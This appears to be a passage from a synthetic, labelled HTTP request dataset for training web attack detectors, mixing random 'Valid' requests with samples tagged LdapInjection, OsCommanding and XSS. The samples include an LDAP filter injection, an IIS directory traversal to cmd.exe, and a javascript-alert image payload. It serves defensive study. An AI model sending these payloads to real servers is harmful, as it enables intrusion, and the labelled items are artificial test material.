POST /aiehoor4aO/oemtpt3o88oh0oa/dsqilcqcearlraofasoo/eXkEn8ryhkWzw/ejAn/e99pvftral1/eN6Z4QXOz@F/uvpRQlsP3.F87WwifI/ssroE/GYW3Snstdin@1w3u/xoaotk.mspx? HTTP/1.0
Content-Length: 12
Content-Language: l9n,h,eotT
Content-Encoding: compress
Content-Location: http://NnSe2t.it/3eti/cilor/6ekwtn/i5ein5.jpg
Content-MD5: YXNVcGJtaTF1MnNvdGludQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 04 Dec 04 20:27:23 CET
Last-Modified: Tue, 19 Sep 06 04:04:00 CET
Host: 103.236.192.88
Connection: NaeOzlnx
Accept: application/zip, image/*;q=0.0, video/quicktime;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: N-oeegiohw;q=0.2, NtzI-ijasern, pmdli-ms;q=0.1
Cache-Control: no-transform
Client-ip: 108.195.56.200
Cookie: swThlmir0upDo=uJRk;mito2=tO@2n
Cookie2: $Version="8"
Date: Fri, 30 Jan 09 15:45:38 CET
ETag: "zdNFJpd@b7FdQCVXkMk"
Expect: 100-continue
From: Qtafer@rrotHx.be
If-Modified-Since: Sun, 12 Jun 05 13:52:28 CET
If-Unmodified-Since: Wed, 30 Sep 09 09:01:58 UTC
If-Match: "-KTIU@BuuwRweC@_H"
If-None-Match: "UAJQCJ2kqiY1WlXj"
If-Range: Wed, 24 May 06 07:12:39 CET
Max-Forwards: 207
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest cnonce="oiAtpy"
Authorization: Digest qop=nk3lhr
Range: 4-
Referer: /6lcpo/acwhw.msf
TE: trailers,gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/8.3 (X11; U; Solaris 9.1; mf-eh; rv:8.4.1) Gecko/15132251
UA-CPU: 68000
UA-Disp: 523,5412,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6323x133
Via: FTP/1.4 www.aAeetj.html, oz0/7.7 www.Rxad.js:598
Transfer-Encoding: dfpi; ootn4rn=snaret
Upgrade: jie/1.0, iaAlda/7.0
Warning: 042 55.252.234.189 "mLniet61zeaoq" "Tue, 18 Nov 08 09:37:46 UTC"
X-Forwarded-For: 96.92.231.105
X-Serial-Number: 9424795318731679930
----: --------------------
~~~~~: ~~~~~~~~~~~~~

_rbWUrI9Zu=l

End - Id: 32921
Start - Id: 1282
class: Valid
GET /33oit4h2bh5hli/m2iz9C1-zwgcFezc8/Slagen/nDOh@kwEIf5nreByc1U/0glhpfiriq1e/Olthe1/e4on9btetspa3/6Twl5Taj2Hd/oS12/ntmatAd.php3? HTTP/1.1
Host: 54.211.55.67
Connection: close
Accept: text/plain;q=0.8, video/*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: identity, compress;q=0.0
Accept-Language: em-0;q=0.0, aeaoo-5auen, Yn4-Iaiktlyd, dysarw-B
Cache-Control: max-stale=01
Client-ip: 244.207.145.225
Cookie: rrtwo5xdohed3s=740
Cookie2: $Version="019"
Date: Mon, 08 Sep 08 11:46:46 GMT
ETag: W/"OBfKsTIJ9zsshyG"
Expect: 100-continue
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Mon, 25 Oct 04 14:41:15 CET
If-Unmodified-Since: Tue, 01 May 07 05:38:45 GMT
If-Match: "BAX1DAQopxVZOE82sR"
If-None-Match: "LOM7P6_4prd90kLS5jRB"
If-Range: "xVoAiLKqm@5aYPY8"
Max-Forwards: 327
MIME-Version: 7.7
Pragma: fc=lrler7b
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM cnM4blREb2FvaWRqc3BvNW9ubGFQTWNzZW5hZVNscmF1ZWtzaGxwaHQwYWJ0ZTVz
Range: 282-,2-77614,032140-
Referer: /ermheu/hota.asp
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/1.4 (Windows; U; Win 9x 0.7; ut-vs; rv:8.2.6) Gecko/06583347
UA-CPU: PowerPC
UA-Disp: 7057,1864,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7486x696
Via: FTP/5.6 127.17.133.65
Transfer-Encoding: deflate
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 247.175.0.48
X-Serial-Number: 794730
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1282
Start - Id: 25814
class: Valid
GET /caarOs1s5bmSS6lsdOoc/s7Tdjan/tuoafmt13tt8eoeyenl9/ewoyQkIhhpdIeEtce/formSbi31dGH62_n/xYgAyKHV/ypt7taoas3gagbiit.js?wORhawS89Aa8ita=%3Dr%5Cete+f6ybf&ons=74661255&tceen5h=oncayturbjamqmamd&5Eitmotos=formggan53eoQretinserthlA%3Fso&T7eT=aVPZD&fu=02291166&http@g-dtHRH=lwrd HTTP/1.0
Host: www.eiilszA.com:09
Connection: rfgtiv
Accept: application/postscript, text/*, application/*
Accept-Charset: *
Accept-Encoding: deflate;q=0.5
Accept-Language: am9oiNtm-sD, ttfCt-csb
Cache-Control: max-age=04
Client-ip: 155.0.134.155
Cookie: peodos8xptXlu=2437173;omlOithuor=nghhr?Csn;rRd=pzs;rueEral9Ex=OsetcEin9u;lith=2692780
Cookie2: $Version="827"
Date: Fri, 25 Nov 05 01:43:43 CET
ETag: W/"ss8z4iytfy_NiCId0"
Expect: utdaet=nsn7mee
From: ezNeot@Teed.it
If-Modified-Since: Sun, 26 Jun 05 02:55:19 UTC
If-Unmodified-Since: Thu, 25 Dec 08 11:58:07 GMT
If-Match: "lBVoprcJPpmYKK47"
If-None-Match: "shi1kaM01iLNAAWWA"
If-Range: Wed, 31 Jan 07 04:07:46 GMT
Max-Forwards: 6840
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic aG8zYXJPYjplaHV4bw==
Authorization: Digest qop=auth
Range: 644-,-02
Referer: /sOrt/qufE.msf
TE: gzip;q=0.7,trailers
Trailer: Warning
User-Agent: fkIEccs (ePsJX9-K; eC.Wvy)
UA-CPU: PowerPC
UA-Disp: 560,1729,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 716x600
Via: FTP/5.2 69.232.30.5:538, 9.2 64.215.194.147, aS7/2.5 171.123.41.232
Transfer-Encoding: gzip
Upgrade: ishmn/5.7, ikeoe/3.7, aoiarj/6.2, ramyin/2.9, ne3gs/9.2
Warning: 886 145.152.248.154 "h6n7sqlaahdlAhre0" 
X-Forwarded-For: 243.205.213.82
X-Serial-Number: 5771791492061
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25814
Start - Id: 11174
class: Valid
GET /cMx@XzL9zf6I/syO31fBU@qyRZH/ldPSGGsZ2/Qfwusn/To6fB/WlChxp_GORRfJU_/wncsotoaaletE.css? HTTP/1.1
Host: 215.97.128.174
Connection: close
Accept: text/*, application/zip
Accept-Charset: shift_jis, x-mac-ce, x-mac-ce, x-mac-greek;q=0.4
Accept-Encoding: deflate;q=0.3, deflate;q=0.0, compress;q=0.7, gzip
Accept-Language: cpdj-gyn
Cache-Control: only-if-cached
Client-ip: 72.157.48.145
Cookie: ns3er2e=are5phd7efE7Eh2trr;PvQHhN=i7nJR
Cookie2: $Version="956"
Date: Mon, 25 May 09 22:13:45 UTC
ETag: "TPC6tkqIvIsDHFr.az"
Expect: 100-continue
From: exRkrsa@Adzgatioo.net
If-Modified-Since: Tue, 05 Feb 08 10:37:10 UTC
If-Unmodified-Since: Sun, 22 Apr 07 08:40:47 GMT
If-Match: "Kuchzpuj.czqbdQ"
If-None-Match: "-Tr0iHz8ECd7jKsV"
If-Range: Mon, 16 May 05 10:25:12 CET
Max-Forwards: 605
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: nucsre csotd=enlnnuol
Authorization: Digest nonce
Range: 01809-,9808-,-723
Referer: /soene.jpg
TE: chunked;q=0.1
Trailer: Warning
User-Agent: abvep/9.2.2.9.7
UA-CPU: StrongARM
UA-Disp: 473,1490,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 571x624
Via: se9rbj/8.2 www.0aCT4ai.htm, FTP/2.2 84.248.244.44
Transfer-Encoding: gzip
Upgrade: aSraw/8.9, oumeo/3.1, 3alN/4.2, Kirn/2.1, txon/6.0
Warning: 587 29.152.16.59 "sKvi" "Sat, 16 Jul 05 05:54:58 CET"
X-Forwarded-For: 199.166.24.178
X-Serial-Number: 98553683859236748
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11174
Start - Id: 17376
class: Valid
GET /8almvhhHnsaBuyNuooo/u6atn7oaPlancde/maA/wuemnsEWu4rfIarR9e/oCrSoeF5htMeh/Ridi/i.uW510fVYwmo/65/ahd/L2lH_uFmwxvEsZlink/etEeao0nHgnieesr/lt8Z-DJLaWZo.htm?AniFesei=++rR&hm747ecUqxM=s&rseMAt=39951 HTTP/1.0
Host: www.ieqnstepip.ch
Connection: close
Accept: audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: sEeeuE-tsYe;q=0.7, tHigs-rKng;q=0.8
Cache-Control: max-age=600
Client-ip: 92.22.206.82
Cookie: n4=9374954;adgero=365;aiw0rneedankDyi=oVfw9dAeOS;izrismetewn=a&
Cookie2: $Version="9"
Date: Wed, 06 Feb 08 02:21:10 GMT
ETag: W/"LLWCNtYswCIam8A"
Expect: s8ba=blew1r;aetws
From: yyIsne@ooTpl.net
If-Modified-Since: Tue, 03 Oct 06 13:57:16 CET
If-Unmodified-Since: Mon, 30 Jul 07 19:48:49 GMT
If-Match: *
If-None-Match: *
If-Range: "_9YBEc0WV4okhUa-"
Max-Forwards: 23
MIME-Version: 6.8
Pragma: llu3raa=hdts38D
Proxy-Authorization: ofdre 8Etxoxoo=kwnne
Authorization: NTLM cGRlY2RVaW9QYkRkaXByYXJlMHVWc2lmdG5ucmxrZm9v
Range: 98234-2322,3589-76048,8-
Referer: /pSlNl/eh1a.mp3
TE: trailers,deflate;q=0.5,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.0 (Machintosh; U; Mac OS X 5.6; Kn-2z; rv:1.6.0) Gecko/47386428
UA-CPU: MIPS
UA-Disp: 436,9131,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0771x1366
Via: FTP/4.3 www.3faN.css, FTP/3.9 www.toyC.tiff
Transfer-Encoding: qSyMfa
Upgrade: eiha/4.0
Warning: 093 www.vAsrre.js "dcdsstiU7bfkren0e6ts" "Wed, 14 Jul 04 12:45:04 GMT"
X-Forwarded-For: 53.169.130.69
X-Serial-Number: 534036492924791
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17376
Start - Id: 20280
class: Valid
GET /4I/gb2to/eilz5iahSttfsEn/lABOOtYAsEUk/nF/iga5arEftt/BlB5f_BqJS.shtml?e4dni=2939437628&su1sOpRdwht=a+eoUunk9led HTTP/1.1
Host: 116.49.70.123
Connection: close
Accept: text/*;q=0.1, application/*;q=0.9, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-store
Client-ip: 21.43.27.67
Cookie: pab=H)2 2m ;feilesirr05c=kg4 having;tnN=r1dtreplaceemlexecmazt;die=te;aaaUnom2th=sf-D9b;t6fchwbesqlh=ncsno=nm
Cookie2: $Version="26"
Date: Tue, 27 Dec 05 20:39:03 GMT
ETag: W/"GaGJnzog2Z7mqcrS0jW"
Expect: 100-continue
From: OolLe3@sxRs.net
If-Modified-Since: Wed, 10 Nov 04 10:25:31 CET
If-Unmodified-Since: Wed, 23 Jan 08 08:14:33 CET
If-Match: "c11.SRT.YlTJxumOIrM9"
If-None-Match: *
If-Range: Fri, 16 Oct 09 08:29:08 GMT
Max-Forwards: 323
MIME-Version: 1.5
Pragma: it=egOsew5e
Proxy-Authorization: NTLM bjhlMWlsbWF0bWVvM2VoMnNUb3Bob252ZWxrQXRhcmlpeWhheg==
Authorization: Digest cnonce="76ee"
Range: 2-254176
Referer: http://www.hll3hy.net/e2Ensac/nlsTip.pl
TE: gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/7.4 (compatible; Konqueror/8.8; Mac OS X; RnEt; zri9eA; 6dIs)
UA-CPU: MIPS
UA-Disp: 161,462,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 0564x652
Via: 8.0 www.chiihwot.jpeg:58
Transfer-Encoding: deflate
Upgrade: eCc/4.2, tne/4.8, kdeqH/8.0
Warning: 671 175.201.189.37 "gtdEwqaressoqzswEtt" "Sat, 22 Jul 06 04:39:44 GMT"
X-Forwarded-For: 97.185.253.211
X-Serial-Number: 11361465282
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20280
Start - Id: 5088
class: Valid
POST /rabQ4fSlYdfTGKm@X/sx-.xb_T3TMXZ/hhX1tluXQK2kflM87o/iaUttbrw/zb6cc/b74mail8/y2/XH77kt/w7ototuOje3cTtlOfp3n/ofnIvE5yAswfRWGObh5/ndTrfMk-.Oa6AriQ@/rsrttrihnveS2ussc.jpeg? HTTP/1.1
Content-Length: 223
Content-Language: tcg7,oSetogrt,yyeRe
Content-Encoding: gzip
Content-Location: http://nrhitt.biz/icfs/esyc.exe
Content-MD5: bTJpaXRjYXNkaWhPdGhTcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 26 Jan 08 24:30:39 GMT
Last-Modified: Tue, 20 Jul 04 11:53:12 GMT
Host: www.w20gi.org
Connection: keep-alive
Accept: image/png;q=0.2, video/*, application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.4
Cache-Control: max-stale
Client-ip: 117.65.56.190
Cookie: nlcisAt=cf]iopenub
Cookie2: $Version="5"
Date: Fri, 04 Nov 05 09:31:45 UTC
ETag: "DaBEn5Miu.YgdvkWi"
Expect: 100-continue
From: eiats@ade7g.de
If-Modified-Since: Thu, 19 Aug 04 21:36:05 GMT
If-Unmodified-Since: Thu, 22 Apr 04 14:27:23 CET
If-Match: "QveQ3tUlPsDkv8vTbSx"
If-None-Match: *
If-Range: "m9CMlImUagdV0uL4UB1s"
Max-Forwards: 4
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic dGlzRzhldzpsN3dpaW53eQ==
Authorization: Basic YTF4aTpmb0FlZW9s
Range: 4666-,507125-81685,186998-
Referer: http://www.vzjP.de/oyr6tlzr/lsinf.wmn
TE: chunked;q=0.3,trailers,trailers
Trailer: Host
User-Agent: Mozilla/1.0 (Windows; U; Win98 4.7; as-th; rv:0.8.4) Gecko/77327558
UA-CPU: PowerPC
UA-Disp: 284,073,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7848x0876
Via: FTP/5.7 25.6.94.212, 1.5 112.66.234.153
Transfer-Encoding: tigr; Enor=ylTnr
Upgrade: wdrl1/4.6, o0t/6.1, R5oleg/3.8, gde/0.1
Warning: 740 137.222.185.208 "p2tgir" "Wed, 26 Oct 05 07:18:45 CET"
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 100173301629912
----: -------------------
~~~~~: ~~~~~~~~~~

adta=32&aitIoTJic=4notsf5cmolIsdsto&tftro2aee=ehenrE3in&ladtccUtiD=5333700&fh=TDo:system&luS=l+pc7style&Ee=7&iflpvniiieo3we=apasswd&oAo=f&5rhpeerMhdOs=thpel28Xsis&unqr=e&sL1Fkm=577&1wV_CSh5OxI=a@3148J-TL&EDwx=53208833

End - Id: 5088
Start - Id: 38928
class: LdapInjection
GET /uZIO72l9jC44pfXiNHE/igdkFUs7tSadts28.css?9MDs@TlF=4ettSNi&kr=s&atnlw=81%29%28%26%28objectClass%3Dts7%29%28%7C%28sn+++%3D+++bruR%29%28cn%3Dr+J*%29%29&fvnlalUiimy=4&58ihreaO=5240&1lKa=J4m&qviihthsoleeaO2=935165467&d0btigeaki=ed&eo=xem&emE6enagcvotdap=aIceitEal9n9Io2&IYbft0Ytd=428&0TGLformkh19l=sodtdtamejevggls7&CPTfQ_a3Hprocessing-instructionmxp_=rinlul3oi HTTP/1.0
Host: www.3lss.de:80
Connection: close
Accept: image/*;q=0.9, image/*, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.234.213.150
Cookie: e0eh59hhdDe=cMX25Mo5
Cookie2: $Version="0"
Date: Tue, 13 Apr 10 11:16:10 GMT
ETag: "eEIaAeCLc.OCQI1"
Expect: 100-continue
From: Utnn8c@iodssieo.biz
If-Modified-Since: Sat, 18 Mar 06 22:31:12 GMT
If-Unmodified-Since: Sat, 16 Aug 08 22:52:50 CET
If-Match: *
If-None-Match: "63ndIiN7l.Y-a9W"
If-Range: *
Max-Forwards: 24
MIME-Version: 7.2
Pragma: wditoeae='tttitt'
Proxy-Authorization: mtSl wopwaseh=raeaa
Authorization: NTLM dGRmMWxiYW8yZXRzM2Fscm5rZGtlbGhpc2dobnR6aHR2MGFsY3l0RHVp
Range: -48
Referer: http://ini0au9.gov/1tash.jpg
TE: trailers,trailers
Trailer: Pragma
User-Agent: ectreao2shmmxealf
UA-CPU: Sparc
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: smcm/4.6 127.112.178.109, 8.5 www.uchs.html, 8.0 181.188.205.125
Transfer-Encoding: A0Paa
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 212.86.228.108
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 38928
Start - Id: 22708
class: Valid
GET /neguamtak/eelsroqhil/mXMLRYcukD31hM4hW/2wdlat58sro5liaSalhi/mj4gR2Nx.swf?dn=05&opskP=%3D%25res&Reptro=dorcpo+&gaSo=%3AiunionjpvlstylebtRvbscript%26s2vare&2ijfh6e=0430586&JMPwd1nB2=Escript+Men HTTP/1.0
Host: www.M0sq.be:777
Connection: cdfet1
Accept: */*;q=0.0
Accept-Charset: windows-874;q=0.4
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: gnail=ao
Client-ip: 24.173.40.220
Cookie: zpO=nhr;ee5dlacifeeitu=elqeA<avbscriptotmo Masri
Cookie2: $Version="4"
Date: Mon, 31 Oct 05 19:15:33 CET
ETag: W/"XUHbUD3CedbGOUJ@"
Expect: 100-continue
From: fwue@n7oczlrtbi.it
If-Modified-Since: Fri, 25 Sep 09 11:37:56 CET
If-Unmodified-Since: Mon, 24 Jul 06 06:20:21 CET
If-Match: *
If-None-Match: *
If-Range: "Y8DIyk223FWkigoH"
Max-Forwards: 3
MIME-Version: 2.0
Pragma: T3isSb='lzt'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic bmNlYlRhaGE6aGlzZG5uTg==
Range: -0811
Referer: /raers/Pjaers.tar
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/2.4 (compatible; Konqueror/1.4; Linux i586; lpnptepsso; ybtEhnn)
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: 9.9 252.92.232.150, 3.9 4.156.178.99:70139
Transfer-Encoding: illee2
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 287 114.101.191.4 "analt2uUr8sles" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 22708
Start - Id: 43833
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.smquthiy.it
Connection: close
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: deflate, deflate, gzip
Accept-Language: ua-IabehH, w-c;q=0.5, s1ujrRm-awp
Cache-Control: max-age=02
Client-ip: 172.122.152.72
Cookie: 9a3epnq=63;d5etxlt=c)nE4passthruiframemhat1apDoaEA;eehtw1psatkoaui=22165;yih0un=0045697
Cookie2: $Version="61"
Date: Tue, 18 Sep 07 05:57:42 UTC
ETag: "XjNn@14_sGqxnijJkTZ"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Tue, 07 Jul 09 04:27:31 CET
If-Unmodified-Since: Mon, 10 Oct 05 02:19:34 UTC
If-Match: "irp1IvVnJAT7@cT"
If-None-Match: *
If-Range: "JJLnz_Jj8MknVuRPq"
Max-Forwards: 8
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: NTLM d3JhcnppaGF6bWlFYm5pUG9zZHQ0bGRFczBlc2g5b2NldW8w
Range: 653-,494-99921,2-094773
Referer: /tdeq2mn/xohSr.tar
TE: trailers,trailers
Trailer: Accept
User-Agent: Mozilla/0.2 (Machintosh; U; PPC Mac OS X 1.3; la-jp; rv:1.0.6) Gecko/50382811
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6925x167
Via: FTP/9.1 237.25.183.253:05820
Transfer-Encoding: compress
Upgrade: ogl/5.5, riwhR/8.3, eedl4/2.6, eOr/4.7, eho0/5.4
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 396755923911
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43833
Start - Id: 32683
class: Valid
POST /hfLuOlFco3F3VfVmCQC.mdb? HTTP/1.0
Content-Length: 167
Content-Language: e,oEeo
Content-Encoding: compress
Content-Location: http://www.xeo8ta.cz/ficm7les/Isefr9h/entsu/etto.cgi
Content-MD5: aXVxTnNhOGVsYTB1b09hYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Jun 05 09:39:24 GMT
Last-Modified: Wed, 12 Apr 06 08:43:30 UTC
Host: 89.191.157.2:83
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: min-fresh=5
Client-ip: 216.228.51.28
Cookie: 1lmdSb=paro;xh_EM4zoLh-5=tuNR_@f;Rlj_u=3;Edn=hie
Cookie2: $Version="68"
Date: Thu, 24 Jan 08 14:05:04 UTC
ETag: W/"DWXN36T3yI9FYHLPJE"
Expect: 100-continue
From: ehmije@nnt84tTw.st
If-Modified-Since: Mon, 26 Dec 05 11:56:10 CET
If-Unmodified-Since: Fri, 08 Apr 05 13:44:18 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7433
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic ZXhvcTlkaWU6bGFoOWE=
Authorization: NTLM b2lwdGRudWxOM3RlaW5hbjl0ZW1kV3dib2U3aXQyZ2Q3dGhzb2phaDF3dG1t
Range: 305943-294113,0-,-7372
Referer: /ft4II/fool3kht/lnntd3.jsp
TE: chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.4 (compatible; Konqueror/2.9; Linux i586; 1oevfy; lina)
UA-CPU: PowerPC
UA-Disp: 6556,232,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 610x5370
Via: 6.3 184.149.74.202, 2.6 209.217.205.187, HTTP/3.6 www.utizcob.css
Transfer-Encoding: e6iB; tmmbrnnc=hEtmqcs
Upgrade: ercu/0.8, 0hiEfa/9.7, iMd25D/0.0
Warning: 696 84.193.51.16 "ch1tuoo" 
X-Forwarded-For: 130.40.193.83
X-Serial-Number: 7602506068987
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

e1loh=pmgpseechoBpOi&mxmladeleteqoptq=6412783975&lde0oeo2iOhs=W5~pepassthruoa&LVNN5NandQofk=asock_streamcmdea&-0Pq=sclatgHdetdroil&ylhl=ia3&sNIAur14=opmmaYg@ae5;

End - Id: 32683
Start - Id: 933
class: Valid
GET /opufpei2iBeut/vOK3SubHd96POjG@5A.css?f98eouedneasEHh=54&eshOnseoTa=tkFlg0v4P31G&sh=142205&sD8Les=t5a&sired=509&tocc0Io=nnr7thGq9eas&rd=LcstautoexecrMxow7nscript8&3zYadmin9=2150&tNnRusl3n0ane=nrshoupdateedpositiont&toseEUee99te=8f%3Anr&dloeszKtnafas0=m&ymv6bu=rFFrFJ1HB&mtmWwiwco6tRsX=%3Atld&arasKsahu=59&h0m9faesxr=ntnyN HTTP/1.0
Host: www.reee8tnIEx.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-age=5468
Client-ip: 127.172.26.34
Cookie: gNutE=etd5ResaTMui:
Cookie2: $Version="175"
Date: Sat, 25 Sep 04 15:30:51 UTC
ETag: "jr06Kr9AbFL4OWD"
Expect: 100-continue
From: shr8m@eagitmhb.de
If-Modified-Since: Wed, 12 Dec 07 20:16:29 GMT
If-Unmodified-Since: Sun, 17 Jun 07 16:03:29 GMT
If-Match: *
If-None-Match: *
If-Range: "9E5yIBn9I5uReJxV"
Max-Forwards: 38
MIME-Version: 3.0
Pragma: iMoaKss5=a20
Proxy-Authorization: Digest nc=3BA1ee0d
Authorization: Digest username="Wdsiin"
Range: 37-165,99813-448132
Referer: http://lfathft.uk/ntovj.jsp
TE: trailers,trailers
Trailer: Expect
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 2.0; rn-cs; rv:8.6.0) Gecko/33200347
UA-CPU: Sparc
UA-Disp: 705,7453,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 272x609
Via: HTTP/2.6 www.oaetdaf.htm
Transfer-Encoding: identity
Upgrade: o1s/3.7, ahZe/0.6, res/2.0, cnrn/2.4, 3itua/3.6
Warning: 028 90.73.184.74:3067 "pe3oiolmIthbRveDesnt" 
X-Forwarded-For: 21.215.62.37
X-Serial-Number: 09721285233182
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 933
Start - Id: 32491
class: Valid
GET /prsemayyoNn/gcitwn7/sI61ykV0div./xEap5.aspx?eaEjwinh=k&-kZN1formSYN7=d%27&ehajclsvrxrl=o0b0dh2&rcntccit6=02279 HTTP/1.0
Host: 104.142.248.189:80
Connection: close
Accept: text/*
Accept-Charset: euc-cn;q=0.5, cp-936, windows-1255;q=0.7, iso-2022-jp;q=0.5, x-mac-cyrillic
Accept-Encoding: gzip;q=0.8, deflate, gzip
Accept-Language: Srcsana-mHn
Cache-Control: no-cache
Client-ip: 190.82.67.201
Cookie: ameri=fOHFX8xtAy;mn=:aopen
Cookie2: $Version="5"
Date: Sun, 19 Oct 08 04:54:42 CET
ETag: "ld8Bp9My.mrVep5H0h"
Expect: 1nee
From: rea2@tkrte.uk
If-Modified-Since: Mon, 19 Dec 05 18:14:54 CET
If-Unmodified-Since: Mon, 08 Jan 07 13:16:33 CET
If-Match: *
If-None-Match: "grrnxipfT97ox2.AXgjg"
If-Range: *
Max-Forwards: 29
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest nc=7E1c1459
Authorization: t6d1 sYlndee=res4Dt
Range: -99,-1
Referer: /3esUU/RSfi.mdb
TE: gzip;q=0.3,trailers,trailers
Trailer: Date
User-Agent: yoesoEx5su/7.6.7
UA-CPU: x86
UA-Disp: 050,1094,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 630x705
Via: See/0.3 www.uklwsiw.gif, 4.7 86.102.195.93:3369
Transfer-Encoding: identity
Upgrade: ottr8/8.0, iwmS/1.0, oey/2.0, rief/2.4
Warning: 713 41.175.127.210 "4pro4MwehDewuNefafn" 
X-Forwarded-For: 236.106.207.155
X-Serial-Number: 31593732
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32491
Start - Id: 47671
class: XSS
GET /St6aesgEjs/rT.PA/tepcpfisgeAl5j.css?9s653=eeaform3&cs5sswzcwhn=g2R2HsQ.G&nk3inac0r0smorr=%3Cimg%2Bsrc%3Djavascript%3A++++alert+%28%27lt6Oe.eefi%27%29++%3E&ABFtQSwherePPq=219294897&tw=m8b&0wrihXAgqesjze=eue++&ig72=y+u&dedeGpAggugwaai=+9yEqcbinmsoneWk&e6paidruqnochn=ns1tu&scetoiAtmI=56774769&fun=hmuDihaaehtew&nWe2rOvrb=tJOvf_q HTTP/1.0
Host: www.stthgiosbe.it
Connection: close
Accept: video/quicktime, audio/*, application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: neornsdE-IA;q=0.8
Cache-Control: only-if-cached
Client-ip: 39.154.184.38
Cookie: obf=tlRwatt1ag;ziteA=1196;Ia=59565;xcrt9v=cy;eg9cc=35792
Cookie2: $Version="8"
Date: Wed, 11 Jan 06 18:48:08 GMT
ETag: W/"z_T1tK75-Wf.Z._"
Expect: 6dleoav=hnlO
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Wed, 08 Mar 06 21:44:58 UTC
If-Unmodified-Since: Sun, 03 May 09 16:37:21 CET
If-Match: "7MPLPnX-EZG2rd-IRL"
If-None-Match: *
If-Range: *
Max-Forwards: 3489
MIME-Version: 7.4
Pragma: no-cache
